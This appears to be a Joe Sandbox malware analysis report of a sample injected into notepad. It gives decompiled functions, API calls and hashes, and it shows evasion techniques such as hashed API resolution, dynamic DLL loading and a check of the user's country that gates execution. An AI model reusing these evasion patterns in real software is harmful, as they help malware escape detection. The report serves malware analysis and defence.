                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 64%
                                                    			E0041B082(int _a4) {
                                                    				intOrPtr _v0;
                                                    				void* _v117;
                                                    				void* _t16;
                                                    				void* _t17;
                                                    
                                                    				asm("loope 0xffffffa2");
                                                    				_t17 = _t16 - 1;
                                                    				_t9 = _v0;
                                                    				_push(_t17);
                                                    				_t5 = _t9 + 0xca0; // 0xca0
                                                    				E0041B9B0( *((intOrPtr*)(_v0 + 0xa18)), _t9, _t5,  *((intOrPtr*)(_v0 + 0xa18)), 0, 0x36);
                                                    				ExitProcess(_a4);
                                                    			}
                                                    0x0041b089
                                                    0x0041b08d
                                                    0x0041b093
                                                    0x0041b09c
                                                    0x0041b0a2
                                                    0x0041b0aa
                                                    0x0041b0b8

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(vWA,?,00415F1D,00415F1D,?,00415776,?,?,?,?,?,00000000,00409C63,?), ref: 0041B03D
                                                    • ExitProcess.KERNELBASE(0041C48F,?,?,0041C48F,00000000,00000000), ref: 0041B0B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateExitHeapProcess
                                                    • String ID: vWA
                                                    • API String ID: 1054155344-1528592229
                                                    • Opcode ID: 5aa41e28b468d9b0d63613d672c180d8e362ee632ee0d916fa3d3cc579db1699
                                                    • Instruction ID: 7c9262438622dce2d724f26de31a00fda54a6464a1015e9671b07ce6936c2503
                                                    • Opcode Fuzzy Hash: 5aa41e28b468d9b0d63613d672c180d8e362ee632ee0d916fa3d3cc579db1699
                                                    • Instruction Fuzzy Hash: 96F0EC712012047FD724EF608C81EE77B6DEF8A380F188599FA881F246C638A505CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 124 41b010-41b041 call 41b9b0 RtlAllocateHeap
                                                    C-Code - Quality: 100%
                                                    			E0041B010(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                    				void* _t10;
                                                    
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                    				_t6 =  &_a8; // 0x415776
                                                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}
                                                    0x0041b027
                                                    0x0041b032
                                                    0x0041b03d
                                                    0x0041b041

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(vWA,?,00415F1D,00415F1D,?,00415776,?,?,?,?,?,00000000,00409C63,?), ref: 0041B03D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: vWA
                                                    • API String ID: 1279760036-1528592229
                                                    • Opcode ID: e77891752dfc437e4e37da3c687c4fa59a94b2c4f2e68d5705797ab49e5e053f
                                                    • Instruction ID: 9531688935f3a2b7056db7c89bb0bf16f165683fb50d21261ac8578b5a96acb1
                                                    • Opcode Fuzzy Hash: e77891752dfc437e4e37da3c687c4fa59a94b2c4f2e68d5705797ab49e5e053f
                                                    • Instruction Fuzzy Hash: 1CE012B1200208ABDB18EF99DC45EA737ACEF88754F018159BA085B242CA30F9118AF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 217 407708-40770f 218 407711-40775a call 41c9e0 call 41d5c0 call 40ac60 call 4160c0 217->218 219 407766-40776e PostThreadMessageW 217->219 223 40778e-407792 218->223 233 40775c-407764 218->233 221 407770-40778a call 40a3f0 219->221 222 40778d 219->222 221->222 222->223 233->219
                                                    C-Code - Quality: 61%
                                                    			E00407708(signed int __ebx, signed int* __ecx, long _a8) {
                                                    				char _v63;
                                                    				char _v64;
                                                    				void* _t14;
                                                    				int _t15;
                                                    				long _t25;
                                                    				int _t30;
                                                    				void* _t33;
                                                    				void* _t35;
                                                    				signed int _t40;
                                                    
                                                    				asm("popfd");
                                                    				_t40 =  *__ecx & __ebx;
                                                    				asm("lock push esi");
                                                    				asm("loope 0x57");
                                                    				_t33 = _t35;
                                                    				_v64 = 0;
                                                    				E0041C9E0( &_v63, 0, 0x3f);
                                                    				E0041D5C0( &_v64, 3);
                                                    				_t14 = E0040AC60(_t40, _a8 + 0x20,  &_v64); // executed
                                                    				_t15 = E004160C0(_a8 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
                                                    				_t30 = _t15;
                                                    				if(_t30 != 0) {
                                                    					_t25 = _a8;
                                                    					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                    					_t42 = _t15;
                                                    					if(_t15 == 0) {
                                                    						_t15 =  *_t30(_t25, 0x8003, _t33 + (E0040A3F0(_t42, 1, 8) & 0x000000ff) - 0x40, _t15);
                                                    					}
                                                    				}
                                                    				return _t15;
                                                    			}
                                                    0x00407708
                                                    0x0040770a
                                                    0x0040770c
                                                    0x0040770f
                                                    0x00407711
                                                    0x0040771f
                                                    0x00407723
                                                    0x0040772e
                                                    0x0040773e
                                                    0x0040774e
                                                    0x00407753
                                                    0x0040775a
                                                    0x0040775d
                                                    0x0040776a
                                                    0x0040776c
                                                    0x0040776e
                                                    0x0040778b
                                                    0x0040778b
                                                    0x0040778d
                                                    0x00407792

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040776A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 3f23bb3c737ff08707a3c4a95a73d0eb0c53856556a8807e6d69a66852011e5c
                                                    • Instruction ID: 3d5f5b9934c717b101e74174524500087f75e88854ce687e6e3f10d6100ee1ef
                                                    • Opcode Fuzzy Hash: 3f23bb3c737ff08707a3c4a95a73d0eb0c53856556a8807e6d69a66852011e5c
                                                    • Instruction Fuzzy Hash: DB012B31A8432877E721A6A48C42FEE775C9F41B54F04012EFE00BA1C1E6A9790583EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 234 407710-40771f 235 407728-40775a call 41d5c0 call 40ac60 call 4160c0 234->235 236 407723 call 41c9e0 234->236 243 40775c-40776e PostThreadMessageW 235->243 244 40778e-407792 235->244 236->235 246 407770-40778a call 40a3f0 243->246 247 40778d 243->247 246->247 247->244
                                                    C-Code - Quality: 82%
                                                    			E00407710(void* __eflags, intOrPtr _a4, long _a8) {
                                                    				char _v67;
                                                    				char _v68;
                                                    				void* _t12;
                                                    				intOrPtr* _t13;
                                                    				int _t14;
                                                    				long _t21;
                                                    				intOrPtr* _t25;
                                                    				void* _t26;
                                                    				void* _t30;
                                                    
                                                    				_t30 = __eflags;
                                                    				_v68 = 0;
                                                    				E0041C9E0( &_v67, 0, 0x3f);
                                                    				E0041D5C0( &_v68, 3);
                                                    				_t12 = E0040AC60(_t30, _a4 + 0x20,  &_v68); // executed
                                                    				_t13 = E004160C0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                                    				_t25 = _t13;
                                                    				if(_t25 != 0) {
                                                    					_t21 = _a8;
                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                    					_t32 = _t14;
                                                    					if(_t14 == 0) {
                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A3F0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                    					}
                                                    					return _t14;
                                                    				}
                                                    				return _t13;
                                                    			}
                                                    0x00407710
                                                    0x0040771f
                                                    0x00407723
                                                    0x0040772e
                                                    0x0040773e
                                                    0x0040774e
                                                    0x00407753
                                                    0x0040775a
                                                    0x0040775d
                                                    0x0040776a
                                                    0x0040776c
                                                    0x0040776e
                                                    0x0040778b
                                                    0x0040778b
                                                    0x00000000
                                                    0x0040778d
                                                    0x00407792

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040776A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 0b8e47dd33048c3222986f524c30b1a8e0c7cbeaaeb081c5baf88ced5fc3f73d
                                                    • Instruction ID: a86de320067088b8f8cb5ec0faf1b7318b3594de9c5643b2e8657df454d3e80d
                                                    • Opcode Fuzzy Hash: 0b8e47dd33048c3222986f524c30b1a8e0c7cbeaaeb081c5baf88ced5fc3f73d
                                                    • Instruction Fuzzy Hash: E401A271A8022877E720A6958C43FFF776C9B05B54F05412AFF04BA1C1E6A8B90647EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 40ac60-40ac89 call 41d810 253 40ac8b-40ac8e 250->253 254 40ac8f-40ac9d call 41dc30 250->254 257 40acad-40acbe call 41bf50 254->257 258 40ac9f-40acaa call 41deb0 254->258 263 40acc0-40acd4 LdrLoadDll 257->263 264 40acd7-40acda 257->264 258->257 263->264
                                                    C-Code - Quality: 100%
                                                    			E0040AC60(void* __eflags, void* _a4, intOrPtr _a8) {
                                                    				char* _v8;
                                                    				struct _EXCEPTION_RECORD _v12;
                                                    				struct _OBJDIR_INFORMATION _v16;
                                                    				char _v536;
                                                    				void* _t15;
                                                    				struct _OBJDIR_INFORMATION _t17;
                                                    				struct _OBJDIR_INFORMATION _t18;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    
                                                    				_v8 =  &_v536;
                                                    				_t15 = E0041D810( &_v12, 0x104, _a8);
                                                    				_t31 = _t30 + 0xc;
                                                    				if(_t15 != 0) {
                                                    					_t17 = E0041DC30(__eflags, _v8);
                                                    					_t32 = _t31 + 4;
                                                    					__eflags = _t17;
                                                    					if(_t17 != 0) {
                                                    						E0041DEB0( &_v12, 0);
                                                    						_t32 = _t32 + 8;
                                                    					}
                                                    					_t18 = E0041BF50(_v8);
                                                    					_v16 = _t18;
                                                    					__eflags = _t18;
                                                    					if(_t18 == 0) {
                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                    						return _v16;
                                                    					}
                                                    					return _t18;
                                                    				} else {
                                                    					return _t15;
                                                    				}
                                                    			}
                                                    0x0040ac7c
                                                    0x0040ac7f
                                                    0x0040ac84
                                                    0x0040ac89
                                                    0x0040ac93
                                                    0x0040ac98
                                                    0x0040ac9b
                                                    0x0040ac9d
                                                    0x0040aca5
                                                    0x0040acaa
                                                    0x0040acaa
                                                    0x0040acb1
                                                    0x0040acb9
                                                    0x0040acbc
                                                    0x0040acbe
                                                    0x0040acd2
                                                    0x00000000
                                                    0x0040acd4
                                                    0x0040acda
                                                    0x0040ac8e
                                                    0x0040ac8e
                                                    0x0040ac8e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040ACD2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: f8ac295e407975537513146be1bb5df484d05ea24f2b1d024a619217ac9b3a8d
                                                    • Instruction ID: 7d2d2691d04f913abf86de482769a3f1e23fd1bc718f8c7278f7f3c8543eec58
                                                    • Opcode Fuzzy Hash: f8ac295e407975537513146be1bb5df484d05ea24f2b1d024a619217ac9b3a8d
                                                    • Instruction Fuzzy Hash: FC0152B5D0020DABDB10DBA1DC42FDEB3789B14308F0041A9A908A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 271 41b1a3-41b1a8 272 41b198-41b1a0 271->272 273 41b1aa-41b1ca call 41b9b0 271->273 275 41b1cf-41b1e4 LookupPrivilegeValueW 273->275
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000038,0040DC52,0040DC52,00000038,00000000,?,00409CD5), ref: 0041B1E0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c779d79db25648cf788ea0da2d5e3bcf39dc541d2f5782382e0d881a5cfe6673
                                                    • Instruction ID: b1dedc979f16b74caf917331ccdd0a16b2eac396301f5a9b62dfe22d0fec585b
                                                    • Opcode Fuzzy Hash: c779d79db25648cf788ea0da2d5e3bcf39dc541d2f5782382e0d881a5cfe6673
                                                    • Instruction Fuzzy Hash: 34F0BEB22002046FD720EFA5DC84EE7776AEF88350F24865AF94C97201C636A852CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 288 41b050-41b081 call 41b9b0 RtlFreeHeap
                                                    C-Code - Quality: 100%
                                                    			E0041B050(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                    				char _t10;
                                                    
                                                    				_t3 = _a4 + 0xc98; // 0xc98
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}
                                                    0x0041b05f
                                                    0x0041b067
                                                    0x0041b07d
                                                    0x0041b081

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409C63,?,?,00409C63,00000060,00000000,00000000,?,?,00409C63,?,00000000), ref: 0041B07D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: bffc035fc95c7fb6115f2492d24ccf34cd58972b4d8a740086584b169eed1361
                                                    • Instruction ID: 18bc34bdc8a8a025dd8f95242a3faac5137062bc64c9578494f85fc18b85250d
                                                    • Opcode Fuzzy Hash: bffc035fc95c7fb6115f2492d24ccf34cd58972b4d8a740086584b169eed1361
                                                    • Instruction Fuzzy Hash: 1CE012B1210208ABDB14EF89DC49EE737ACEF88750F018159BA085B242CA30E9148AF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041B1B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                    				int _t10;
                                                    
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}
                                                    0x0041b1ca
                                                    0x0041b1e0
                                                    0x0041b1e4

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000038,0040DC52,0040DC52,00000038,00000000,?,00409CD5), ref: 0041B1E0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 627355b1c7c0b2f51261f4296627d7e61d18f3edfb04b1bef467ad73c2fbb93e
                                                    • Instruction ID: 9b0f825b135ad0e330760513f85aa2426ec36a092e0589bcf2a73696262f7f31
                                                    • Opcode Fuzzy Hash: 627355b1c7c0b2f51261f4296627d7e61d18f3edfb04b1bef467ad73c2fbb93e
                                                    • Instruction Fuzzy Hash: 77E01AB12002086BD710DF49CC45EE737ADEF88650F118159BA0857241C630E8118AF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph not preserved): basic blocks 40de00-40de19, 40de1f-40de24, 40de26-40de27 and 40de28-40de39 (GetUserGeoID); edges 40de00->40de1f, 40de00->40de1a (call 4160c0), 40de1f->40de26, 40de1f->40de28, 40de1a->40de1f.
                                                    C-Code - Quality: 37%
                                                    			// Decompiled; _t2 is a temporary the decompiler left undeclared.
                                                    			E0040DE00(intOrPtr _a4) {
                                                    				intOrPtr* _t2;
                                                    				intOrPtr* _t7;
                                                    				void* _t8;
                                                    
                                                    				_t2 = _a4 + 0xbc4; // 0x300488c3
                                                    				// Resolve the target function through the sample's own lookup routine (E004160C0)
                                                    				// using the constant 0x998e91b2; the API trace below identifies the result as GetUserGeoID.
                                                    				_t7 = E004160C0(_a4 + 0x20,  *_t2, 0, 0, 0x998e91b2);
                                                    				if(_t7 != 0) {
                                                    					_t8 =  *_t7(0x10); // executed; 0x10 = GEOCLASS_NATION
                                                    					// Returns 1 only when the user's nation GeoID equals 0xf1, otherwise 0.
                                                    					return 0 | _t8 == 0x000000f1;
                                                    				} else {
                                                    					return _t7;
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetUserGeoID.KERNEL32(00000010,?,?,?,0041C47A,00000000), ref: 0040DE2A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: User
                                                    • String ID:
                                                    • API String ID: 765557111-0
                                                    • Opcode ID: 144f24e5a539b50c9be6193a4247c02d868f7ed71f4a99d4b063ac81500d11db
                                                    • Instruction ID: 69cc6d2820aba085cee411751e6272000d0ccb627d0ea31548fd7d2101827e92
                                                    • Opcode Fuzzy Hash: 144f24e5a539b50c9be6193a4247c02d868f7ed71f4a99d4b063ac81500d11db
                                                    • Instruction Fuzzy Hash: 71E02B3778030827F620D5E59C82FB6324E9B84708F4484B4F90CEB3C1D5A9E9804054
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			// Decompiled; _t5 and _t3 are temporaries the decompiler left undeclared.
                                                    			E0041B090(intOrPtr _a4, int _a8) {
                                                    				intOrPtr _t5;
                                                    				intOrPtr _t3;
                                                    
                                                    				_t5 = _a4;
                                                    				_t3 = _t5 + 0xca0; // 0xca0
                                                    				// Same helper (E0041B9B0) that precedes the other API wrappers in this dump; purpose not documented here.
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                                    				// Terminates the current process with the caller-supplied exit code.
                                                    				ExitProcess(_a8);
                                                    			}

                                                    APIs
                                                    • ExitProcess.KERNELBASE(0041C48F,?,?,0041C48F,00000000,00000000), ref: 0041B0B8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: a09f8eadf475b8ef1be715b3f2b550fcaeefb97ce79b4c97c862ae484b1f2ae7
                                                    • Instruction ID: 05fe2936629bfb3434c0e828c1cddaadeb720a4aad8c825b47c6863ec12df94e
                                                    • Opcode Fuzzy Hash: a09f8eadf475b8ef1be715b3f2b550fcaeefb97ce79b4c97c862ae484b1f2ae7
                                                    • Instruction Fuzzy Hash: BED012716002187BD620DB99CC45FD7779CDF45794F154065BA4C5B241C934BA01C7E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    • Opcode ID: 977dcdef72f1a6d9ccc03eea98cc0574543313852c65f79eb783fc8592a720f3
                                                    • Instruction ID: 33b5e248781f98565fe8b8d36c215b10918742ad7dae99484343abc5bdcd7d2e
                                                    • Opcode Fuzzy Hash: 977dcdef72f1a6d9ccc03eea98cc0574543313852c65f79eb783fc8592a720f3
                                                    • Instruction Fuzzy Hash: 71F06231214348ABDB21AB10CC85F2A7FE9EF95754F14C4D9F8466A1D3D7628811E721
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: fad249e3268e41daf26a34be8086f375db633b0f6526c82041b88057a98e1fb6
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
